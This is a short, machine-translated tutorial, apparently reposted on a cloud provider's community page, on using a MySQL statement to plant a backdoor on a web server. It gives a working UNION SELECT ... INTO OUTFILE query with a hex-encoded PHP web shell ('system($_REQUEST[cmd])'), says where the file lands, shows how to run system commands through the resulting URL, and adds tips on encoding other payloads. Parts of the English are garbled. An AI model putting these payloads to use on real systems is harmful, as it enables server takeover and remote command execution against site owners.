MySQL statement to generate a backdoor Trojan

Source: Internet
Author: User

This article mainly describes how to generate a backdoor Trojan using a MySQL statement correctly. The following describes how to generate a backdoor Trojan using a MySQL statement, I hope this will help you in your future studies.

How to generate a backdoor Trojan using a MySQL statement!

 
 
  1. SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,
    0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from 
    vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php' 

Run the preceding statement in phpmyadmin or MySQL (the best combination of MySQL and PHP) to generate cmd under C:/inetpub/wwwroot. php file, the content is the original vbb_strikes content, followed:

 
 
  1. 2 3 <?php system($_REQUEST[cmd]);?> 

Again Through http://www.xxx.com/cmd.php? Cmd = dir c: \ to execute the system doscommand!

Which sort is what?

Is <? Php system ($ _ REQUEST [cmd]);?> If you do not use this method, other encodings may appear in different SQL versions, such as % xx. Which backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] key to connect the hex in it!

The above content is an introduction to the method for generating Backdoor trojans using MySQL statements. I hope you will gain some benefits.


The above content describes how to generate a backdoor Trojan in a MySQL statement. I hope it will help you in this regard.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.